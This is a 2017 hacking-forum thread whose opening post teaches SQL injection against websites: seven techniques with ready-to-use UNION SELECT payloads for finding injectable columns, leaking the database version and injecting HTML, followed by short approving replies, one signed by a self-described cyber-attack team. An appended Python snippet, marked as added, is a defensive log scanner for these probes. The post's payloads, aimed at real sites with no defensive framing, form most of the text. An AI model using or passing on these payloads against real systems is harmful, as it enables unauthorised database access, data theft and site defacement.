

Find Vulnerable Column



03-08-2017, 11:00 AM #1
MadSec Offline BlackHat **
Registered
Posts:7 Threads:5 Joined:Mar 2017 Reputation: 0
Mood: Mad
How to find Vulnerable Columns?
ANS:-
1st Technique:-
use -> id = -1 union select 1,2,3,4,5--
use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
use -> id = .1/1.2/12.4 union select 1,2,3,4,5--   [Thanks to Crown sir]

Note:- I use null and bybysql. Don't be confused by them; you can use whatever you like, meaning use things which don't exist [Thanks to Hack Forum]

2nd Technique :- False Parameter
Here False Parameter means: put something that makes a wrong response into our SQL parameter, like
(a) 1=2, 1=0
use -> id=1 or 1=2 union select 1,2,3,4,5--
use -> id=1 or 1=0 union select 1,2,3,4,5--

(b) We can also use having, like, <>
use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
use -> id=1  1  like/LIKE 2 union select 1,2,3,4,5--
use -> id=1   1 <> 1 union select 1,2,3,4,5--
use -> id=1 {having/and} 1 like 2  union select 1,2,3,4,5--
use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5--     /* use either  having or and


(c) Also you can use the and false/AND FALSE statement
use ->  id=1  and false union select 1,2,3,4,5--

3rd Technique :-  Divide by 0  means  -> /0    and  +div+0    
use -> id =12/0 union select 1,2,3,4,5--

use -> id = 12+div+0+ union select 1,2,3,4,5--

4th Technique :- Look closely, or scratch the HTML source code

The number can potentially be displayed anywhere; when it's kind of rough, just change the query to make the whole thing more visible, to something like

http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--

Above we use 1111, 2222 instead of 1, 2 respectively

After writing that code, open the source code, then search for the 'Column Number' like 1111,2222,3333,4444,5555 by using CTRL+F (for finding something in source code). Then check where that number appears in the source code.

Sometimes the number is displayed in the page title.

When you get the vulnerable columns, then you want to display the version, user, database or some HTML parts visibly on the page. So for that, follow these steps :-
 
i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
Where  
223e =>    ">
3c696d67207372633d22   =>       <img src="  
*Remember we use 0x so that the above hex code works

ii.) To print our name
id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
Where 
0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d =>   \"><font color = red size=4>AAKASH</font><!--

5th Technique :-
You tried all the above techniques but still can't get a vulnerable column; then you can also use this 5th technique.... What's new in this technique? See :-

You can use union select 1,2,3,4,5--   as  union (select 1,2,3,4,5)--
use :- id=-2 union (select 1,2,3,4,5)--
/*  If you see a vulnerable column like 3, then
 
use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--   

6th Technique :- True Parameter

use -> id=1 +where+1=1  union select 1,2,3,4,5--
use -> id=1 +and+50=50  union select 1,2,3,4,5--
use -> id=1 =75=75  union select 1,2,3,4,5--

7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
Friends, when you can't find the number of columns, you can also use this technique. With this technique, not only do you find the number of columns, you also get the vulnerable columns.
Follow the following steps
1st do  ->  union select 1--
2nd do -> union select 1,2--
3rd do -> union select 1,2,3--
4th do -> union select 1,2,3,4--
5th do -> union select 1,2,3,4,5--

Do the above steps until you can't get vulnerable columns


Thanks and credit goes to
1. AJKARO
2. MakMan
3. Benzi

[Image: qXShBci.png]
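Added example (not part of the original post or thread): a log-review helper for defenders that flags the numeric UNION SELECT probes and the one-column-at-a-time counting described in the post above. The "<client> <request URL>" log layout, the sample lines and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# UNION [ALL] [(]SELECT followed by a list of bare integer placeholders.
UNION_RE = re.compile(
    r"\bunion\s+(?:all\s+)?\(?\s*select\s+(\d+(?:\s*,\s*\d+)*)", re.I)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # inline comments used as spacing

# Constructed sample lines in an assumed "<client> <request URL>" layout.
SAMPLE_LOG = [
    "192.0.2.10 /b.php?id=-1+union+select+1--",
    "192.0.2.10 /b.php?id=-1+union+select+1,2--",
    "192.0.2.10 /b.php?id=-1+UNION+SELECT+1,2,3--",
    "192.0.2.10 /b.php?id=12/0%20union%20(select%201111,2222,3333,4444)--",
    "198.51.100.7 /b.php?id=1%20and%20false%20union/**/select%201,2,3,4,5--",
    "203.0.113.5 /search.php?q=credit+union+select+committee&page=2",
    "203.0.113.5 /b.php?id=12",
]

def probe_width(value):
    """Number of leading integer columns in a UNION SELECT probe, else 0."""
    match = UNION_RE.search(SQL_COMMENT.sub(" ", value))
    return len(match.group(1).split(",")) if match else 0

def find_union_probes(log_lines):
    """Collect probe widths per (client, path, parameter) and flag sweeps."""
    seen = defaultdict(set)
    for line in log_lines:
        client, _, url = line.partition(" ")
        parts = urlsplit(url)
        # parse_qsl percent-decodes values and turns '+' into a space.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            width = probe_width(value)
            if width:
                seen[(client, parts.path, name)].add(width)
    findings = []
    for (client, path, name), widths in sorted(seen.items()):
        # Three consecutive widths means someone is counting columns one by one.
        sweep = any(w + 1 in widths and w + 2 in widths for w in widths)
        findings.append({"client": client, "path": path, "param": name,
                         "widths": sorted(widths), "sweep": sweep})
    return findings

if __name__ == "__main__":
    for finding in find_union_probes(SAMPLE_LOG):
        print(finding)
```

The matcher counts only leading integer placeholders, so a probe that replaces a column with a function call is under-counted. A hit on a parameter is a prompt to check whether that parameter reaches a query without being bound as a prepared-statement argument.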

03-08-2017, 12:22 PM #2
mohamed-capo Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Mar 2017 Reputation: 0
Mood: None
Thumbsupsmileyanim Thumbsupsmileyanim Thumbsupsmileyanim Thumbsupsmileyanim

03-08-2017, 10:29 PM #3
Hunter PCA Offline Junior Member **
Registered
Posts:25 Threads:6 Joined:Mar 2017 Reputation: 0
Mood: Thinking
Old Methods ....

-- I know, I am something, because GOD never creates garbage --

03-10-2017, 01:52 AM #4
Faisal 1337 Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:19 Threads:6 Joined:Jan 2015 Reputation: 2
Mood: Hacker
Old Method Any Good

We Are Team Pak Cyber Attackers

03-11-2017, 07:27 AM #5
kasihputih Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Mar 2017 Reputation: 0
Mood: None
nice and keep share bro

03-11-2017, 02:47 PM #6
Mr.Hawk Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
Good share..

04-23-2017, 12:35 AM #7
GHT Ghost Offline Junior Member **
Registered
Posts:5 Threads:2 Joined:Mar 2017 Reputation: 1
Mood: None
old but gold
Thanks for sharing bro :p

05-18-2017, 08:54 PM #8
UmairAhmed Offline E@gle Invectus **
Registered
Posts:9 Threads:0 Joined:Mar 2017 Reputation: 0
Mood: None
Thanks for sharing.
OLD is Always GOLD
